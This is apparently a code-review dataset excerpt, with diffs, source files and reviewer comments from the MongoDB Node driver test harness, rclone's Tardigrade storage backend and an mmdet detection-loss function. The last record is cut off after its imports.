// use the client without transactions to verify
return testContext.sharedClient
.db(testContext.dbName)
.collection(outcomeCollection)
.find({}, { readPreference: 'primary', readConcern: { level: 'local' } })
.sort({ _id: 1 })
.toArray()
.then(docs => {
expect(docs).to.matchMongoSpec(testData.outcome.collection.data);
});
}
return Promise.resolve();
}
function validateExpectations(commandEvents, spec, savedSessionData) {
if (!spec.expectations || !Array.isArray(spec.expectations) || spec.expectations.length === 0) {
return;
}
const actualEvents = normalizeCommandShapes(commandEvents);
const rawExpectedEvents = spec.expectations.map(x => x.command_started_event);
const expectedEvents = normalizeCommandShapes(rawExpectedEvents);
expect(actualEvents).to.have.length(expectedEvents.length);
expectedEvents.forEach((expected, idx) => {
const actual = actualEvents[idx];
if (expected.commandName != null) {
expect(actual.commandName).to.equal(expected.commandName);
}
if (expected.databaseName != null) {
expect(actual.databaseName).to.equal(expected.databaseName);
}
const actualCommand = actual.command;
const expectedCommand = expected.command;
if (expectedCommand.sort) {
// TODO: This is a workaround that works because all sorts in the specs
// are objects with one key; ideally we'd want to adjust the spec definitions
// to indicate whether order matters for any given key and set general
// expectations accordingly (see NODE-3235)
expect(Object.keys(expectedCommand.sort)).to.have.lengthOf(1);
expect(actualCommand.sort).to.be.instanceOf(Map);
expect(actualCommand.sort.size).to.equal(1);
const expectedKey = Object.keys(expectedCommand.sort)[0];
expect(actualCommand.sort).to.have.all.keys(expectedKey);
actualCommand.sort = { [expectedKey]: actualCommand.sort.get(expectedKey) };
}
expect(actualCommand).withSessionData(savedSessionData).to.matchMongoSpec(expectedCommand);
});
}
function normalizeCommandShapes(commands) {
return commands.map(def => {
const output = JSON.parse(
EJSON.stringify(
{
command: def.command,
commandName: def.command_name || def.commandName || Object.keys(def.command)[0],
databaseName: def.database_name ? def.database_name : def.databaseName
},
{ relaxed: true }
)
);
// TODO: this is a workaround to preserve sort Map type until NODE-3235 is completed
if (def.command.sort) {
output.command.sort = def.command.sort;
}
return output;
});
}
function extractCrudResult(result, operation) {
if (Array.isArray(result) || !isRecord(result)) {
return result;
}
if (result.value) {
// some of our findAndModify results return more than just an id, so we need to pluck
const resultKeys = Object.keys(operation.result);
if (resultKeys.length === 1 && resultKeys[0] === '_id') {
return { _id: result.value._id };
}
return result.value;
}
return operation.result;
}
function isTransactionCommand(command) {
return ['startTransaction', 'commitTransaction', 'abortTransaction'].indexOf(command) !== -1;
}
function isTestRunnerCommand(context, commandName) {
const testRunnerContext = context.testRunner;
let methods = new Set();
let object = testRunnerContext;
while (object !== Object.prototype) {
Object.getOwnPropertyNames(object)
.filter(prop => typeof object[prop] === 'function' && prop !== 'constructor')
.map(prop => methods.add(prop));
object = Object.getPrototypeOf(object);
}
return methods.has(commandName);
}
function extractBulkRequests(requests) {
return requests.map(request => ({ [request.name]: request.arguments }));
}
function translateOperationName(operationName) {
if (operationName === 'runCommand') return 'command';
if (operationName === 'listDatabaseNames') return 'listDatabases';
if (operationName === 'listCollectionNames') return 'listCollections';
return operationName;
}
function normalizeReadPreference(mode) {
return mode.charAt(0).toLowerCase() + mode.substr(1);
}
function resolveOperationArgs(operationName, operationArgs, context) {
const result = [];
function pluck(fromObject, toArray, fields) {
for (const field of fields) {
if (fromObject[field]) toArray.push(fromObject[field]);
}
}
// TODO: migrate all operations here
if (operationName === 'distinct') {
pluck(operationArgs, result, ['fieldName', 'filter']);
if (result.length === 1) result.push({});
} else {
return;
}
// compile the options
const options = {};
if (operationArgs.options) {
Object.assign(options, operationArgs.options);
if (options.readPreference) {
options.readPreference = normalizeReadPreference(options.readPreference.mode);
}
}
if (operationArgs.session) {
if (isTransactionCommand(operationName)) return;
options.session = context[operationArgs.session];
}
result.push(options);
// determine if there is a callback to add
if (operationArgs.callback) {
result.push(() =>
testOperations(operationArgs.callback, context, { swallowOperationErrors: false })
);
}
return result;
}
const CURSOR_COMMANDS = new Set(['find', 'aggregate', 'listIndexes', 'listCollections']);
const ADMIN_COMMANDS = new Set(['listDatabases']);
function maybeSession(operation, context) {
return (
operation &&
operation.arguments &&
operation.arguments.session &&
context[operation.arguments.session]
);
}
const kOperations = new Map([
[
'recordPrimary',
(operation, testRunner, context /*, options */) => {
testRunner.recordPrimary(context.client);
}
],
[
'waitForPrimaryChange',
(operation, testRunner, context /*, options */) => {
return testRunner.waitForPrimaryChange(context.client);
}
],
[
'runOnThread',
(operation, testRunner, context, options) => {
const args = operation.arguments;
const threadName = args.name;
const subOperation = args.operation;
return testRunner.runOnThread(
threadName,
testOperation(subOperation, context[subOperation.object], context, options)
);
}
],
[
'createIndex',
(operation, collection, context /*, options */) => {
const fieldOrSpec = operation.arguments.keys;
const options = { session: maybeSession(operation, context) };
if (operation.arguments.name) options.name = operation.arguments.name;
return collection.createIndex(fieldOrSpec, options);
}
],
[
'createCollection',
(operation, db, context /*, options */) => {
const collectionName = operation.arguments.collection;
const session = maybeSession(operation, context);
return db.createCollection(collectionName, { session });
}
],
[
'dropCollection',
(operation, db, context /*, options */) => {
const collectionName = operation.arguments.collection;
const session = maybeSession(operation, context);
return db.dropCollection(collectionName, { session });
}
],
[
'dropIndex',
(operation, collection /*, context, options */) => {
const indexName = operation.arguments.name;
const session = maybeSession(operation, context);
return collection.dropIndex(indexName, { session });
}
],
[
'mapReduce',
(operation, collection, context /*, options */) => {
const args = operation.arguments;
const map = args.map;
const reduce = args.reduce;
const options = { session: maybeSession(operation, context) };
if (args.out) options.out = args.out;
return collection.mapReduce(map, reduce, options);
}
]
]);
/**
* @param {object} operation the operation definition from the spec test
* @param {object} obj the object to call the operation on
* @param {object} context a context object containing sessions used for the test
* @param {object} [options] Optional settings
* @param {boolean} [options.swallowOperationErrors] Generally we want to observe operation errors, validate them against our expectations, and then swallow them. In cases like `withTransaction` we want to use the same `testOperations` to build the lambda, and in those cases it is not desireable to swallow the errors, since we need to test this behavior.
*/
function testOperation(operation, obj, context, options) {
options = options || { swallowOperationErrors: true };
const opOptions = {};
let args = [];
const operationName = translateOperationName(operation.name);
let opPromise;
if (kOperations.has(operationName)) {
opPromise = kOperations.get(operationName)(operation, obj, context, options);
} else {
if (operation.arguments) {
args = resolveOperationArgs(operationName, operation.arguments, context);
if (args == null) {
args = [];
Object.keys(operation.arguments).forEach(key => {
if (key === 'callback') {
args.push(() =>
testOperations(operation.arguments.callback, context, {
swallowOperationErrors: false
})
);
return;
}
if (['filter', 'fieldName', 'document', 'documents', 'pipeline'].indexOf(key) !== -1) {
return args.unshift(operation.arguments[key]);
}
if ((key === 'map' || key === 'reduce') && operationName === 'mapReduce') {
return args.unshift(operation.arguments[key]);
}
if (key === 'command') return args.unshift(operation.arguments[key]);
if (key === 'requests')
return args.unshift(extractBulkRequests(operation.arguments[key]));
if (key === 'update' || key === 'replacement') return args.push(operation.arguments[key]);
if (key === 'session') {
if (isTransactionCommand(operationName)) return;
opOptions.session = context[operation.arguments.session];
return;
}
if (key === 'returnDocument') {
opOptions.returnDocument = operation.arguments[key].toLowerCase();
return;
}
if (key === 'options') {
Object.assign(opOptions, operation.arguments[key]);
if (opOptions.readPreference) {
opOptions.readPreference = normalizeReadPreference(opOptions.readPreference.mode);
}
return;
}
if (key === 'readPreference') {
opOptions[key] = normalizeReadPreference(operation.arguments[key].mode);
return;
}
opOptions[key] = operation.arguments[key];
});
}
}
if (
args.length === 0 &&
!isTransactionCommand(operationName) &&
!isTestRunnerCommand(context, operationName)
) {
args.push({});
}
if (Object.keys(opOptions).length > 0) {
// NOTE: this is awful, but in order to provide options for some methods we need to add empty
// query objects.
if (operationName === 'distinct') {
args.push({});
}
args.push(opOptions);
}
if (ADMIN_COMMANDS.has(operationName)) {
obj = obj.db().admin();
}
if (operation.name === 'listDatabaseNames' || operation.name === 'listCollectionNames') {
opOptions.nameOnly = true;
}
if (CURSOR_COMMANDS.has(operationName)) {
// `find` creates a cursor, so we need to call `toArray` on it
const cursor = obj[operationName].apply(obj, args);
opPromise = cursor.toArray();
} else {
// wrap this in a `promiseTry` because some operations might throw
opPromise = promiseTry(() => obj[operationName].apply(obj, args));
}
}
if (operation.error) {
opPromise = opPromise.then(
() => {
throw new Error('expected an error!');
},
() => {}
);
}
if (operation.result) {
const result = operation.result;
if (
result.errorContains != null ||
result.errorCodeName ||
result.errorLabelsContain ||
result.errorLabelsOmit
) {
return opPromise.then(
() => {
throw new Error('expected an error!');
},
err => {
const errorContains = result.errorContains;
const errorCodeName = result.errorCodeName;
const errorLabelsContain = result.errorLabelsContain;
const errorLabelsOmit = result.errorLabelsOmit;
if (errorLabelsContain) {
expect(err).to.have.property('errorLabels');
expect(err.errorLabels).to.include.members(errorLabelsContain);
}
if (errorLabelsOmit) {
if (err.errorLabels && Array.isArray(err.errorLabels) && err.errorLabels.length !== 0) {
expect(errorLabelsOmit).to.not.include.members(err.errorLabels);
}
}
if (operation.result.errorContains) {
expect(err.message).to.match(new RegExp(escape(errorContains), 'i'));
}
if (errorCodeName) {
expect(err.codeName).to.equal(errorCodeName);
}
if (!options.swallowOperationErrors) {
throw err;
}
}
);
}
return opPromise.then(opResult => {
const actual = extractCrudResult(opResult, operation);
expect(actual).to.matchMongoSpec(operation.result);
});
}
return opPromise;
}
function convertCollectionOptions(options) {
const result = {};
Object.keys(options).forEach(key => {
if (key === 'readPreference') {
result[key] = normalizeReadPreference(options[key].mode);
} else {
result[key] = options[key];
}
});
return result;
}
function testOperations(testData, operationContext, options) {
options = options || { swallowOperationErrors: true };
return testData.operations.reduce((combined, operation) => {
return combined.then(() => {
const object = operation.object || 'collection';
if (object === 'collection') {
const db = operationContext.database;
const collectionName = operationContext.collectionName;
const collectionOptions = operation.collectionOptions || {};
operationContext[object] = db.collection(
collectionName,
convertCollectionOptions(collectionOptions)
);
}
return testOperation(operation, operationContext[object], operationContext, options);
});
}, Promise.resolve());
}
module.exports = {
TestRunnerContext,
gatherTestSuites,
generateTopologyTests,
parseRunOn
};
| 1 | 20,548 | Is this left over from debugging? | mongodb-node-mongodb-native | js |
@@ -86,7 +86,7 @@ before(function(_done) {
}
this.configuration = new TestConfiguration(parsedURI, context);
- done();
+ client.close(done);
});
});
}); | 1 | 'use strict';
const path = require('path');
const fs = require('fs');
const MongoClient = require('../../..').MongoClient;
const TestConfiguration = require('./config');
const parseConnectionString = require('../../../lib/core/uri_parser');
const eachAsync = require('../../../lib/core/utils').eachAsync;
const mock = require('mongodb-mock-server');
const wtfnode = require('wtfnode');
const MONGODB_URI = process.env.MONGODB_URI || 'mongodb://localhost:27017';
const filters = [];
function initializeFilters(client, callback) {
const filterFiles = fs
.readdirSync(path.join(__dirname, 'filters'))
.filter(x => x.indexOf('js') !== -1);
// context object that can be appended to as part of filter initialization
const context = {};
eachAsync(
filterFiles,
(filterName, cb) => {
const FilterModule = require(path.join(__dirname, 'filters', filterName));
const filter = new FilterModule();
if (typeof filter !== 'object') {
cb(new TypeError('Type of filter must be an object'));
return;
}
if (!filter.filter || typeof filter.filter !== 'function') {
cb(new TypeError('Object filters must have a function named filter'));
return;
}
filters.push(filter);
if (typeof filter.initializeFilter === 'function') {
filter.initializeFilter(client, context, cb);
} else {
cb();
}
},
err => callback(err, context)
);
}
function filterOutTests(suite) {
suite.tests = suite.tests.filter(test => filters.every(f => f.filter(test)));
suite.suites.forEach(suite => filterOutTests(suite));
}
before(function(_done) {
// NOTE: if we first parse the connection string and redact auth, then we can reenable this
// const usingUnifiedTopology = !!process.env.MONGODB_UNIFIED_TOPOLOGY;
// console.log(
// `connecting to: ${chalk.bold(MONGODB_URI)} using ${chalk.bold(
// usingUnifiedTopology ? 'unified' : 'legacy'
// )} topology`
// );
const client = new MongoClient(MONGODB_URI, { useNewUrlParser: true, useUnifiedTopology: true });
const done = err => client.close(err2 => _done(err || err2));
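  // `done` always closes the shared client before signalling mocha, and it
  // reports the setup error if there was one, otherwise any error from close.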
client.connect(err => {
if (err) {
done(err);
return;
}
initializeFilters(client, (err, context) => {
if (err) {
done(err);
return;
}
// replace this when mocha supports dynamic skipping with `afterEach`
filterOutTests(this._runnable.parent);
parseConnectionString(MONGODB_URI, (err, parsedURI) => {
if (err) {
done(err);
return;
}
this.configuration = new TestConfiguration(parsedURI, context);
done();
});
});
});
});
// ensure all mock connections are closed after the suite is run
after(() => mock.cleanup());
// optionally enable test runner-wide plugins
require('./plugins/deferred');
require('./plugins/session_leak_checker');
require('./plugins/client_leak_checker');
// configure mocha and chai
require('mocha-sinon');
const chai = require('chai');
chai.use(require('sinon-chai'));
chai.use(require('../../functional/spec-runner/matcher').default);
chai.config.includeStack = true;
chai.config.showDiff = true;
chai.config.truncateThreshold = 0;
// install signal handlers for printing open/active handles
function dumpAndExit() {
// let other potential handlers run before exiting
process.nextTick(function() {
try {
wtfnode.dump();
} catch (e) {
console.log(e);
}
process.exit();
});
}
process.on('SIGINT', dumpAndExit);
process.on('SIGTERM', dumpAndExit);
| 1 | 18,747 | I've fallen for this before myself :) We _do_ call `close` inside of `done` on L65 | mongodb-node-mongodb-native | js |
@@ -269,7 +269,9 @@ func (f *Fs) connect(ctx context.Context) (project *uplink.Project, err error) {
fs.Debugf(f, "connecting...")
defer fs.Debugf(f, "connected: %+v", err)
- cfg := uplink.Config{}
+ cfg := uplink.Config{
+ UserAgent: "rclone",
+ }
project, err = cfg.OpenProject(ctx, f.access)
if err != nil { | 1 | // +build go1.13,!plan9
// Package tardigrade provides an interface to Tardigrade decentralized object storage.
package tardigrade
import (
"context"
"fmt"
"io"
"log"
"path"
"strings"
"time"
"github.com/pkg/errors"
"github.com/rclone/rclone/fs"
"github.com/rclone/rclone/fs/config"
"github.com/rclone/rclone/fs/config/configmap"
"github.com/rclone/rclone/fs/config/configstruct"
"github.com/rclone/rclone/fs/fserrors"
"github.com/rclone/rclone/fs/hash"
"github.com/rclone/rclone/lib/bucket"
"golang.org/x/text/unicode/norm"
"storj.io/uplink"
)
const (
existingProvider = "existing"
newProvider = "new"
)
var satMap = map[string]string{
"us-central-1.tardigrade.io": "12EayRS2V1kEsWESU9QMRseFhdxYxKicsiFmxrsLZHeLUtdps3S@us-central-1.tardigrade.io:7777",
"europe-west-1.tardigrade.io": "12L9ZFwhzVpuEKMUNUqkaTLGzwY9G24tbiigLiXpmZWKwmcNDDs@europe-west-1.tardigrade.io:7777",
"asia-east-1.tardigrade.io": "121RTSDpyNZVcEU84Ticf2L1ntiuUimbWgfATz21tuvgk3vzoA6@asia-east-1.tardigrade.io:7777",
}
// Register with Fs
func init() {
fs.Register(&fs.RegInfo{
Name: "tardigrade",
Description: "Tardigrade Decentralized Cloud Storage",
NewFs: NewFs,
Config: func(name string, configMapper configmap.Mapper) {
provider, _ := configMapper.Get(fs.ConfigProvider)
config.FileDeleteKey(name, fs.ConfigProvider)
if provider == newProvider {
satelliteString, _ := configMapper.Get("satellite_address")
apiKey, _ := configMapper.Get("api_key")
passphrase, _ := configMapper.Get("passphrase")
				// satelliteString always contains a default value and passphrase can be empty
if apiKey == "" {
return
}
satellite, found := satMap[satelliteString]
if !found {
satellite = satelliteString
}
access, err := uplink.RequestAccessWithPassphrase(context.TODO(), satellite, apiKey, passphrase)
if err != nil {
log.Fatalf("Couldn't create access grant: %v", err)
}
				serializedAccess, err := access.Serialize()
if err != nil {
log.Fatalf("Couldn't serialize access grant: %v", err)
}
configMapper.Set("satellite_address", satellite)
configMapper.Set("access_grant", serialziedAccess)
} else if provider == existingProvider {
config.FileDeleteKey(name, "satellite_address")
config.FileDeleteKey(name, "api_key")
config.FileDeleteKey(name, "passphrase")
} else {
log.Fatalf("Invalid provider type: %s", provider)
}
},
Options: []fs.Option{
{
Name: fs.ConfigProvider,
Help: "Choose an authentication method.",
Required: true,
Default: existingProvider,
Examples: []fs.OptionExample{{
Value: "existing",
Help: "Use an existing access grant.",
}, {
Value: newProvider,
Help: "Create a new access grant from satellite address, API key, and passphrase.",
},
}},
{
Name: "access_grant",
Help: "Access Grant.",
Required: false,
Provider: "existing",
},
{
Name: "satellite_address",
Help: "Satellite Address. Custom satellite address should match the format: `<nodeid>@<address>:<port>`.",
Required: false,
Provider: newProvider,
Default: "us-central-1.tardigrade.io",
Examples: []fs.OptionExample{{
Value: "us-central-1.tardigrade.io",
Help: "US Central 1",
}, {
Value: "europe-west-1.tardigrade.io",
Help: "Europe West 1",
}, {
Value: "asia-east-1.tardigrade.io",
Help: "Asia East 1",
},
},
},
{
Name: "api_key",
Help: "API Key.",
Required: false,
Provider: newProvider,
},
{
Name: "passphrase",
Help: "Encryption Passphrase. To access existing objects enter passphrase used for uploading.",
Required: false,
Provider: newProvider,
},
},
})
}
// Options defines the configuration for this backend
type Options struct {
Access string `config:"access_grant"`
SatelliteAddress string `config:"satellite_address"`
APIKey string `config:"api_key"`
Passphrase string `config:"passphrase"`
}
// Fs represents a remote to Tardigrade
type Fs struct {
name string // the name of the remote
root string // root of the filesystem
opts Options // parsed options
features *fs.Features // optional features
access *uplink.Access // parsed scope
project *uplink.Project // project client
}
// Check the interfaces are satisfied.
var (
_ fs.Fs = &Fs{}
_ fs.ListRer = &Fs{}
_ fs.PutStreamer = &Fs{}
)
// NewFs creates a filesystem backed by Tardigrade.
func NewFs(name, root string, m configmap.Mapper) (_ fs.Fs, err error) {
ctx := context.Background()
// Setup filesystem and connection to Tardigrade
root = norm.NFC.String(root)
root = strings.Trim(root, "/")
f := &Fs{
name: name,
root: root,
}
// Parse config into Options struct
err = configstruct.Set(m, &f.opts)
if err != nil {
return nil, err
}
// Parse access
var access *uplink.Access
if f.opts.Access != "" {
access, err = uplink.ParseAccess(f.opts.Access)
if err != nil {
return nil, errors.Wrap(err, "tardigrade: access")
}
}
if access == nil && f.opts.SatelliteAddress != "" && f.opts.APIKey != "" && f.opts.Passphrase != "" {
access, err = uplink.RequestAccessWithPassphrase(ctx, f.opts.SatelliteAddress, f.opts.APIKey, f.opts.Passphrase)
if err != nil {
return nil, errors.Wrap(err, "tardigrade: access")
}
serializedAccess, err := access.Serialize()
if err != nil {
return nil, errors.Wrap(err, "tardigrade: access")
}
err = config.SetValueAndSave(f.name, "access_grant", serializedAccess)
if err != nil {
return nil, errors.Wrap(err, "tardigrade: access")
}
}
if access == nil {
return nil, errors.New("access not found")
}
f.access = access
f.features = (&fs.Features{
BucketBased: true,
BucketBasedRootOK: true,
}).Fill(f)
project, err := f.connect(ctx)
if err != nil {
return nil, err
}
f.project = project
// Root validation needs to check the following: If a bucket path is
// specified and exists, then the object must be a directory.
//
// NOTE: At this point this must return the filesystem object we've
// created so far even if there is an error.
if root != "" {
bucketName, bucketPath := bucket.Split(root)
if bucketName != "" && bucketPath != "" {
_, err = project.StatBucket(ctx, bucketName)
if err != nil {
return f, errors.Wrap(err, "tardigrade: bucket")
}
object, err := project.StatObject(ctx, bucketName, bucketPath)
if err == nil {
if !object.IsPrefix {
// If the root is actually a file we
// need to return the *parent*
// directory of the root instead and an
// error that the original root
// requested is a file.
newRoot := path.Dir(f.root)
if newRoot == "." {
newRoot = ""
}
f.root = newRoot
return f, fs.ErrorIsFile
}
}
}
}
return f, nil
}
// connect opens a connection to Tardigrade.
func (f *Fs) connect(ctx context.Context) (project *uplink.Project, err error) {
fs.Debugf(f, "connecting...")
defer fs.Debugf(f, "connected: %+v", err)
cfg := uplink.Config{}
project, err = cfg.OpenProject(ctx, f.access)
if err != nil {
return nil, errors.Wrap(err, "tardigrade: project")
}
return
}
// absolute computes the absolute bucket name and path from the filesystem root
// and the relative path provided.
func (f *Fs) absolute(relative string) (bucketName, bucketPath string) {
bn, bp := bucket.Split(path.Join(f.root, relative))
// NOTE: Technically libuplink does not care about the encoding. It is
// happy to work with them as opaque byte sequences. However, rclone
// has a test that requires two paths with the same normalized form
// (but different un-normalized forms) to point to the same file. This
// means we have to normalize before we interact with libuplink.
return norm.NFC.String(bn), norm.NFC.String(bp)
}
// Name of the remote (as passed into NewFs)
func (f *Fs) Name() string {
return f.name
}
// Root of the remote (as passed into NewFs)
func (f *Fs) Root() string {
return f.root
}
// String returns a description of the FS
func (f *Fs) String() string {
return fmt.Sprintf("FS sj://%s", f.root)
}
// Precision of the ModTimes in this Fs
func (f *Fs) Precision() time.Duration {
return time.Nanosecond
}
// Hashes returns the supported hash types of the filesystem.
func (f *Fs) Hashes() hash.Set {
return hash.NewHashSet()
}
// Features returns the optional features of this Fs
func (f *Fs) Features() *fs.Features {
return f.features
}
// List the objects and directories in relative into entries. The entries can
// be returned in any order but should be for a complete directory.
//
// relative should be "" to list the root, and should not have trailing
// slashes.
//
// This should return fs.ErrDirNotFound if the directory isn't found.
func (f *Fs) List(ctx context.Context, relative string) (entries fs.DirEntries, err error) {
fs.Debugf(f, "ls ./%s", relative)
bucketName, bucketPath := f.absolute(relative)
defer func() {
if errors.Is(err, uplink.ErrBucketNotFound) {
err = fs.ErrorDirNotFound
}
}()
if bucketName == "" {
if bucketPath != "" {
return nil, fs.ErrorListBucketRequired
}
return f.listBuckets(ctx)
}
return f.listObjects(ctx, relative, bucketName, bucketPath)
}
func (f *Fs) listBuckets(ctx context.Context) (entries fs.DirEntries, err error) {
fs.Debugf(f, "BKT ls")
buckets := f.project.ListBuckets(ctx, nil)
for buckets.Next() {
bucket := buckets.Item()
entries = append(entries, fs.NewDir(bucket.Name, bucket.Created))
}
return entries, buckets.Err()
}
// newDirEntry creates a directory entry from an uplink object.
//
// NOTE: Getting the exact behavior required by rclone is somewhat tricky. The
// path manipulation here is necessary to cover all the different ways the
// filesystem and object could be initialized and combined.
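//
// For example (hypothetical values): listing with prefix "photos/" and an
// empty relative path turns an object key of "photos/2020/" into a directory
// entry named "2020"; both the prefix and the trailing slash are stripped.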
func (f *Fs) newDirEntry(relative, prefix string, object *uplink.Object) fs.DirEntry {
if object.IsPrefix {
// . The entry must include the relative path as its prefix. Depending on
// | what is being listed and how the filesystem root was initialized the
// | relative path may be empty (and so we use path joining here to ensure
// | we don't end up with an empty path segment).
// |
// | . Remove the prefix used during listing.
// | |
// | | . Remove the trailing slash.
// | | |
// v v v
return fs.NewDir(path.Join(relative, object.Key[len(prefix):len(object.Key)-1]), object.System.Created)
}
return newObjectFromUplink(f, relative, object)
}
func (f *Fs) listObjects(ctx context.Context, relative, bucketName, bucketPath string) (entries fs.DirEntries, err error) {
fs.Debugf(f, "OBJ ls ./%s (%q, %q)", relative, bucketName, bucketPath)
opts := &uplink.ListObjectsOptions{
Prefix: newPrefix(bucketPath),
System: true,
Custom: true,
}
fs.Debugf(f, "opts %+v", opts)
objects := f.project.ListObjects(ctx, bucketName, opts)
for objects.Next() {
entries = append(entries, f.newDirEntry(relative, opts.Prefix, objects.Item()))
}
err = objects.Err()
if err != nil {
return nil, err
}
return entries, nil
}
// ListR lists the objects and directories of the Fs starting from dir
// recursively into out.
//
// relative should be "" to start from the root, and should not have trailing
// slashes.
//
// This should return ErrDirNotFound if the directory isn't found.
//
// It should call callback for each tranche of entries read. These need not be
// returned in any particular order. If callback returns an error then the
// listing will stop immediately.
//
// Don't implement this unless you have a more efficient way of listing
// recursively than doing a directory traversal.
func (f *Fs) ListR(ctx context.Context, relative string, callback fs.ListRCallback) (err error) {
fs.Debugf(f, "ls -R ./%s", relative)
bucketName, bucketPath := f.absolute(relative)
defer func() {
if errors.Is(err, uplink.ErrBucketNotFound) {
err = fs.ErrorDirNotFound
}
}()
if bucketName == "" {
if bucketPath != "" {
return fs.ErrorListBucketRequired
}
return f.listBucketsR(ctx, callback)
}
return f.listObjectsR(ctx, relative, bucketName, bucketPath, callback)
}
func (f *Fs) listBucketsR(ctx context.Context, callback fs.ListRCallback) (err error) {
fs.Debugf(f, "BKT ls -R")
buckets := f.project.ListBuckets(ctx, nil)
for buckets.Next() {
bucket := buckets.Item()
err = f.listObjectsR(ctx, bucket.Name, bucket.Name, "", callback)
if err != nil {
return err
}
}
return buckets.Err()
}
func (f *Fs) listObjectsR(ctx context.Context, relative, bucketName, bucketPath string, callback fs.ListRCallback) (err error) {
fs.Debugf(f, "OBJ ls -R ./%s (%q, %q)", relative, bucketName, bucketPath)
opts := &uplink.ListObjectsOptions{
Prefix: newPrefix(bucketPath),
Recursive: true,
System: true,
Custom: true,
}
objects := f.project.ListObjects(ctx, bucketName, opts)
for objects.Next() {
object := objects.Item()
err = callback(fs.DirEntries{f.newDirEntry(relative, opts.Prefix, object)})
if err != nil {
return err
}
}
err = objects.Err()
if err != nil {
return err
}
return nil
}
// NewObject finds the Object at relative. If it can't be found it returns the
// error ErrorObjectNotFound.
func (f *Fs) NewObject(ctx context.Context, relative string) (_ fs.Object, err error) {
fs.Debugf(f, "stat ./%s", relative)
bucketName, bucketPath := f.absolute(relative)
object, err := f.project.StatObject(ctx, bucketName, bucketPath)
if err != nil {
fs.Debugf(f, "err: %+v", err)
if errors.Is(err, uplink.ErrObjectNotFound) {
return nil, fs.ErrorObjectNotFound
}
return nil, err
}
return newObjectFromUplink(f, relative, object), nil
}
// Put in to the remote path with the modTime given of the given size
//
// When called from outside an Fs by rclone, src.Size() will always be >= 0.
// But for unknown-sized objects (indicated by src.Size() == -1), Put should
// either return an error or upload it properly (rather than e.g. calling
// panic).
//
// May create the object even if it returns an error - if so will return the
// object and the error, otherwise will return nil and the error
func (f *Fs) Put(ctx context.Context, in io.Reader, src fs.ObjectInfo, options ...fs.OpenOption) (_ fs.Object, err error) {
fs.Debugf(f, "cp input ./%s # %+v %d", src.Remote(), options, src.Size())
// Reject options we don't support.
for _, option := range options {
if option.Mandatory() {
fs.Errorf(f, "Unsupported mandatory option: %v", option)
return nil, errors.New("unsupported mandatory option")
}
}
bucketName, bucketPath := f.absolute(src.Remote())
upload, err := f.project.UploadObject(ctx, bucketName, bucketPath, nil)
if err != nil {
return nil, err
}
defer func() {
if err != nil {
aerr := upload.Abort()
if aerr != nil {
fs.Errorf(f, "cp input ./%s %+v: %+v", src.Remote(), options, aerr)
}
}
}()
err = upload.SetCustomMetadata(ctx, uplink.CustomMetadata{
"rclone:mtime": src.ModTime(ctx).Format(time.RFC3339Nano),
})
if err != nil {
return nil, err
}
_, err = io.Copy(upload, in)
if err != nil {
err = fserrors.RetryError(err)
fs.Errorf(f, "cp input ./%s %+v: %+v\n", src.Remote(), options, err)
return nil, err
}
err = upload.Commit()
if err != nil {
if errors.Is(err, uplink.ErrBucketNotFound) {
// Rclone assumes the backend will create the bucket if not existing yet.
// Here we create the bucket and return a retry error for rclone to retry the upload.
_, err = f.project.EnsureBucket(ctx, bucketName)
if err != nil {
return nil, err
}
err = fserrors.RetryError(errors.New("bucket was not available, now created, the upload must be retried"))
}
return nil, err
}
return newObjectFromUplink(f, "", upload.Info()), nil
}
// PutStream uploads to the remote path with the modTime given of indeterminate
// size.
//
// May create the object even if it returns an error - if so will return the
// object and the error, otherwise will return nil and the error.
func (f *Fs) PutStream(ctx context.Context, in io.Reader, src fs.ObjectInfo, options ...fs.OpenOption) (_ fs.Object, err error) {
return f.Put(ctx, in, src, options...)
}
// Mkdir makes the directory (container, bucket)
//
// Shouldn't return an error if it already exists
func (f *Fs) Mkdir(ctx context.Context, relative string) (err error) {
fs.Debugf(f, "mkdir -p ./%s", relative)
bucketName, _ := f.absolute(relative)
_, err = f.project.EnsureBucket(ctx, bucketName)
return err
}
// Rmdir removes the directory (container, bucket)
//
// NOTE: Despite code documentation to the contrary, this method should not
// return an error if the directory does not exist.
func (f *Fs) Rmdir(ctx context.Context, relative string) (err error) {
fs.Debugf(f, "rmdir ./%s", relative)
bucketName, bucketPath := f.absolute(relative)
if bucketPath != "" {
// If we can successfully stat it, then it is an object (and not a prefix).
_, err := f.project.StatObject(ctx, bucketName, bucketPath)
if err != nil {
if errors.Is(err, uplink.ErrObjectNotFound) {
// At this point we know it is not an object,
// but we don't know if it is a prefix for one.
//
// We check this by doing a listing and if we
// get any results back, then we know this is a
// valid prefix (which implies the directory is
// not empty).
opts := &uplink.ListObjectsOptions{
Prefix: newPrefix(bucketPath),
System: true,
Custom: true,
}
objects := f.project.ListObjects(ctx, bucketName, opts)
if objects.Next() {
return fs.ErrorDirectoryNotEmpty
}
return objects.Err()
}
return err
}
return fs.ErrorIsFile
}
_, err = f.project.DeleteBucket(ctx, bucketName)
if err != nil {
if errors.Is(err, uplink.ErrBucketNotFound) {
return fs.ErrorDirNotFound
}
if errors.Is(err, uplink.ErrBucketNotEmpty) {
return fs.ErrorDirectoryNotEmpty
}
return err
}
return nil
}
// newPrefix returns a new prefix for listing conforming to the libuplink
// requirements. In particular, libuplink requires a trailing slash for
// listings, but rclone does not always provide one. Further, depending on how
// the path was initially specified, path normalization may have removed it (e.g. a
// trailing slash from the CLI is removed before it ever gets to the backend
// code).
func newPrefix(prefix string) string {
if prefix == "" {
return prefix
}
if prefix[len(prefix)-1] == '/' {
return prefix
}
return prefix + "/"
}
| 1 | 11,195 | That looks fine! You could use `"rclone/"+fs.Version` too if you wanted. BTW does tardigrade use http under the hood? If you were using rclone's http Client then you'd get a User-Agent and you'd also get support for `-vv --dump bodies` and other nice things. | rclone-rclone | go |
@@ -260,6 +260,10 @@ class FreeAnchorRetinaHead(RetinaHead):
Tensor: Negative bag loss in shape (num_img, num_anchors, num_classes).
""" # noqa: E501, W605
prob = cls_prob * (1 - box_prob)
- negative_bag_loss = prob**self.gamma * F.binary_cross_entropy(
- prob, torch.zeros_like(prob), reduction='none')
- return (1 - self.alpha) * negative_bag_loss
+ neg_prob = 1 - prob
+ # There are some cases when neg_prob = 0.
+ # This will cause the neg_prob.log() to be inf without clamp.
+ neg_prob = torch.clamp(neg_prob, min=1e-12)
+ negative_bag_loss = -prob**self.gamma * neg_prob.log()
+ negative_bag_loss = (1 - self.alpha) * negative_bag_loss
+ return negative_bag_loss | 1 | import torch
import torch.nn.functional as F
from mmdet.core import bbox_overlaps
from ..builder import HEADS
from .retina_head import RetinaHead
